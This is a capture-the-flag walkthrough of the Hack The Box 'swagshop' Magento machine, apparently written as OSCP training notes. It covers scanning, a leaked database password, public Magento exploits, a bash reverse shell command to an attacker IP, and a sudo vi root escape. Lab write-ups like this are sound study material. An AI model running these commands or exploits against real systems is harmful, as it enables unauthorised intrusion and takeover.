Linux Boxes

swagshop

  1. nmap
  2. http
    1. magento scanner OSI
      1. magescan.phar usage
      2. report
        1. index.php/rss/order/NEW/new
        2. app/etc/local.xml
        3. /shell
      3. searchsploit
        1. Remote Code execution credential injection
          1. run
  3. initial foothold
    1. running code_exec.py
      1. burp/debug
  4. priv esc
    1. alt privesc
  5. user/root
  6. lessons learned

swagshop

images/1012-1.png
images/1012-2.png

nmap

nmap discovers


ssh running on port 22


and http running on port 80


images/1013-1.png

a scan of all ports confirms no other services are running
images/1013-2.png

http

navigating to swagshop's webpage shows an online shop run by the popular CMS (content management system) magento,
images/1977-1.png

magento scanner OSI

since magneto is like the wordpress of market sales websites, lets see if there is a scanner we can find online similar to wps



images/1015-1.png

magescan is a github repo that can evaluate the security of a magento site, lets grab it
images/1015-2.pngimages/1015-3.pngimages/1015-4.png
lets move it to our working directory and run it


magescan.phar usage

images/1016-1.png

report

as the repo recommends, lets run it with the arguments:
./magescan.phar scan:all http:10.10.10.140
images/1017-1.png

first off we see the magento version is 1.9.0.0/1
images/1017-2.png


we see there are some reachable url paths that the scan has found for us, lets look into them:
images/1017-3.png
images/1017-4.png
images/1017-5.png

which means these url paths are reachable and worth checking out
app/etc/local.xml
index.php/rss/order/NEW/new
/shell


index.php/rss/order/NEW/new

Navigating to /index.php/rss/order/New/new shows an xml variant RSS that has an interesting link embedded in it
images/1019-1.png
images/1019-2.pngimages/1019-3.png

navigating to images/1019-4.png gives us
images/1019-5.png

app/etc/local.xml

images/1018-1.png


images/1018-2.png

we see we have mysql creds here! lets save them
root
fMVWh7bDHpgZkyfqQXreTjU9

lets try logging in with the creds we found over at /index.php/admin/sales_order

images/1018-3.png

no luck, this isn't the images/1018-4.png service anyway so this was an attempt to see if the box had reused creds



/shell

images/1020-1.png
all these php files load the same message:
images/1020-2.png
nothing here, lets move on...

searchsploit

lets searchsploit magento

images/1022-1.png

since we know the version of magento is 1.9.0.0 / 1.9.0.1, these exploits stand out
images/1022-2.png

we don't have working creds yet so lets try the bottom RCE

Remote Code execution credential injection

mirror the file to your working directory with
searchsploit -m /xml/webapps/37977.py
images/1024-1.png

description:
images/1024-2.png

perfect,
seems we have to update our target, and the public exploits default injected credentials for good practice
images/1024-3.png

lets move the exploit into our directory
images/1024-4.png

change the exploit name
images/1024-5.png

Note: (the webserver is most likely misconfigured because wherever you navigate to any of the links on the page, each leads with index.php in the URL)
Ex:images/1024-6.pngimages/1024-7.png
images/1024-8.pngimages/1024-9.png
so tweak the target to be: http://10.10.10.140/index.php/
images/1024-10.png

and the username/pass to be w.e you want
images/1024-11.png

images/1024-12.png



run

time to run
python cred_inject.py
images/1023-1.png

there are a bunch of invalid characters in the code that are mostly slashes, after removing each of them...
images/1023-2.png

now lets try logging in:
images/1023-3.png

we're logged in as admin!

initial foothold

now that we have working credentials, lets go back to the authenticated RCE exploit we found off searchsploit
images/1025-1.png

checking out the exploit we see a couple of things:
images/1025-2.png

lets rename it to
images/1025-3.png

we see the config parameters but notice install_date, we're gonna have to grab the date from the /app/etc/local.xml file
images/1025-4.png
the date from the xml file images/1025-5.png

so tweaking the config section of the code to look like this
images/1025-6.png


the payload in the exploit is an object injection as ippsec mentioned, there's no need to understand it becfause it is beyond the scope of what the OSCP expects you to know but I may add that too the writeup later:
images/1025-7.png

all we need to know is the usage:
images/1025-8.png



running code_exec.py

images/1026-1.png
ignore that code argument syntax, should look like this:
images/1026-2.png

lets send this through the proxy and see whats going on to do that, uncomment the proxy line:
images/1026-3.png

and fire up burp suite

burp/debug

lets start with a simple whoami cmd
images/1027-1.png

images/1027-2.pngimages/1027-3.png

we see the code isn't getting past the GET before erroring out, and looking at the exploit, the target variable doesn't add the correct exploit URL to the argument so we have to adjust our target parameter to the admin page images/1027-4.png


after that i got a strange error ippsec didn't come accross that showed more than one control was taking up my username variable
images/1027-5.png

but after some research it turns out the username was being called twice
images/1027-6.png
commenting this line out fixed the ambiguity error

images/1027-7.png

looks like were going to have to debug the code from here, ippsec puts a break in the code using pdb
images/1027-8.png

images/1027-9.png

then when we run the code pdb.set_trace() lets us check what is stored in our tunnel variable
images/1027-10.pngimages/1027-11.png

and there's nothing stored in our tunnel variable, but why? the code developer mentioned that the date in the local.xml file had to be as recent as possible, so maybe it's not recent enough?


images/1027-12.png
the request code shows the period of time needs to be 7d within the date_issued variable, but what happens when we set it to 2years instead to extend the grace period?
images/1027-13.png

images/1027-14.png
tunnel now has an object attached to it and continuing the program gives us:

lets try whoami
images/1027-15.png
www-data gets returned! we have code execution!

now run our reverse shell and...
python code_exec.py http://10.10.10.140/index.php/admin 'bash -i "bash -c >& /dev/tcp/10.10.14.62/9001 0>&1"'
images/1027-16.png
images/1027-17.png
a shell!!

priv esc

now that we have a foothold, lets see what kind of permissions we have

images/1029-1.png

since we're allowed to run vi with root privileges on any file withint the /var/ww/html directory, lets create our own file and use vi to edit it and escape it to gain a shell with root privileges
images/1029-2.png

GTFObins is a great resource for escaping binaries with misconfigured security settings
images/1029-3.png

type :! to execute code through vi and then open bash from there and...
images/1029-4.png
images/1029-5.png
we are root!!



alt privesc

thanks to Msphr in the youtube comments we can also use '../' to navigate to any file on the box with vi

sudo vi /var/www/html/../../../root/root.txt
images/1031-1.png

images/1031-2.png

user/root

images/1030-1.png
a448877277e82f05e5ddf9f90aefbac8

images/1030-2.png
gotta love the shirt
c2b087d66e14a652a3b86a130ac56721

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1978-1.png